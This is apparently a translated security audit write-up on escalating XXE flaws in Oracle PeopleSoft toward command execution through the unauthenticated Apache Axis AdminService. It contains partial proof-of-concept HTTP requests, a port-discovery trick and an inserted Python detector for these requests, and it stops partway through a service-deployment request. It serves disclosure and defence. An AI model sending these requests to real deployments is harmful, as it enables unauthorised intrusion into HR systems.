![](/Article/UploadPic/2017-5/20175319508171.png)
A few months ago, I had the privilege of taking part in security audits of several Oracle PeopleSoft deployment projects. The audit targets were mainly the PeopleSoft Human Resources Management System (HRMS) and the PeopleTools development toolkit. Looking through the public material on PeopleSoft security, apart from a few CVE references that could not be confirmed, there is only ERPScan's talk at the HITB conference two years ago. Going by ERPScan's slides, although there is little public security information about PeopleSoft, it is in fact riddled with vulnerabilities.
From the perspective of the security testing I carried out, the PeopleSoft application exposes many unauthenticated service endpoints, presumably for interoperability, and most of these services use default passwords. Such a fragile security environment obviously leaves a door open for an attacker. In this article I will show how an XXE vulnerability can be escalated to system command execution, a problem that may affect all current PeopleSoft versions.
Using an XXE vulnerability to reach the local network
PeopleSoft has had multiple XXE vulnerabilities, such as CVE-2013-3800 and CVE-2013-3821 from earlier years, and most recently CVE-2017-3548, found by ERPScan. Generally speaking, these vulnerabilities can be exploited to obtain password information from the PeopleSoft and WebLogic consoles, but in the test environment carrying this out proved fairly difficult. In addition, since CVE-2017-3548 is a blind XXE and I assumed the target network would be deployed behind a firewall, stealing system information through the XXE was not as simple as one might imagine. First, let us look at the PoC exploit requests for CVE-2013-3821 and CVE-2017-3548:
CVE-2013-3821: Integration Gateway HttpListeningConnector XXE
```http
POST /PSIGW/HttpListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
…
]>
<IBRequest>
  <ExternalOperationName>&x;</ExternalOperationName>
  <OperationType/>
  <From><RequestingNode/>
    <Password/>
    <OrigUser/>
    <OrigNode/>
    <OrigProcess/>
    <OrigTimeStamp/>
  </From>
  <To>
    <FinalDestination/>
    <DestinationNode/>
    <SubChannel/>
  </To>
  <ContentSections>
    <ContentSection>
      <NonRepudiation/>
      <MessageVersion/>
      <Data><![CDATA[your_message_content]]>
      </Data>
    </ContentSection>
  </ContentSections>
</IBRequest>
```
CVE-2017-3548: Integration Gateway PeopleSoftServiceListeningConnector XXE
```http
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
…
```
Looking at it another way, the XXE vulnerability can be used to reach the various services listening on the server's own localhost, which may also bypass firewall rules or authentication checks. For that, we only need to know the PeopleSoft service port. In the end I identified the port from a cookie set by a page I could reach:
```http
Set-Cookie: SNP2118-51500-PORTAL-PSJSESSIONID=9JwqZVxKjzGJn1s5DLf1t46pz91FFb3p! -1515514079;
```
As can be seen, the current PeopleSoft service port is 51500, and the corresponding application can be reached through https://localhost:51500/.
Using the Apache Axis service
In the PeopleSoft architecture, an unauthenticated service, Apache Axis 1.4, is reachable at https://website.com/pspc/services. Apache Axis lets us build a SOAP endpoint from a Java class and then interact with that endpoint through the generated Web Services Description Language (WSDL) and its helper code. The Apache Axis services can be managed through https://website.com/pspc/services/AdminService:
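The detection logic below is an added example, not code from the original post or from PeopleSoft, Oracle or ERPScan. It flags the two request shapes this write-up describes, an external-entity declaration sent to the Integration Gateway connectors and any traffic to the Axis AdminService (with a further label when a WSDD deployment is being registered), over constructed sample requests; the entity URL in the sample is an invalid placeholder.

```python
import re
from dataclasses import dataclass

# Endpoints named in the write-up: the Integration Gateway connectors are
# the XXE sinks; AdminService is the Axis management endpoint that should
# not be reachable without authentication.
IB_CONNECTORS = ("/PSIGW/HttpListeningConnector",
                 "/PSIGW/PeopleSoftServiceListeningConnector")
AXIS_ADMIN = "/pspc/services/AdminService"
WSDD_NS = "xml.apache.org/axis/wsdd/"

# External entity declaration, e.g. <!ENTITY x SYSTEM "..."> (or PUBLIC).
EXT_ENTITY_RE = re.compile(r"<!ENTITY\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.I)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)

@dataclass
class Request:
    method: str
    path: str
    content_type: str
    body: str

def inspect(req: Request) -> list:
    """Return detection labels for one request (empty list means clean)."""
    hits = []
    path = req.path.split("?", 1)[0]
    if path in IB_CONNECTORS and "xml" in req.content_type.lower():
        if EXT_ENTITY_RE.search(req.body):
            hits.append("xxe_external_entity")
        elif DOCTYPE_RE.search(req.body):
            hits.append("xml_doctype_present")  # these connectors need no DTD at all
    if path.startswith(AXIS_ADMIN):
        hits.append("axis_admin_access")        # management endpoint reached at all
        if WSDD_NS in req.body and "deployment" in req.body:
            hits.append("axis_wsdd_deployment") # a new service is being registered
    return hits

# Constructed sample traffic; the entity URL is an invalid placeholder.
SAMPLES = [
    Request("POST", "/PSIGW/HttpListeningConnector", "application/xml",
            '<!DOCTYPE a [<!ENTITY x SYSTEM "http://example.invalid/">]>'
            '<IBRequest><ExternalOperationName>&x;</ExternalOperationName></IBRequest>'),
    Request("POST", "/PSIGW/HttpListeningConnector", "application/xml",
            '<IBRequest><ExternalOperationName>PING</ExternalOperationName></IBRequest>'),
    Request("POST", "/pspc/services/AdminService", "application/xml",
            '<soapenv:Envelope><soapenv:Body><ns1:deployment '
            'xmlns="https://xml.apache.org/axis/wsdd/"/></soapenv:Body></soapenv:Envelope>'),
    Request("GET", "/pspc/services", "", ""),
]

def scan(samples=SAMPLES) -> list:
    """Inspect each sample request; returns one label list per request."""
    return [inspect(r) for r in samples]
```

In a real deployment the same checks belong in front of the gateway (reverse proxy or WAF), and the cleanest mitigation for the first two labels is to disable DTD processing in the connectors' XML parser.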
![](/Article/UploadPic/2017-5/20175319508321.png)
The following is the POST request that asks the Apache Axis admin service to create a SOAP endpoint based on the java.util.Random class; from it we can see how a particular service is created:
```http
POST /pspc/services/AdminService
Host: website.com
SOAPAction: something
Content-Type: application/xml
…
<soapenv:Envelope xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance"
  xmlns:api="https://127.0.0.1/Integrics/Enswitch/API"
  xmlns:xsd="https://www.w3.org/2001/XMLSchema"
  xmlns:soapenv="https://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <ns1:deployment
      xmlns="https://xml.apache.org/axis/wsdd/"
      xmlns:java="https://xml.apache.org/axis/wsdd/providers/java"
      xmlns:ns1="https://xml.apache.org/axis/wsdd/">
      <ns1:service name="RandomService" provider="java:RPC">
```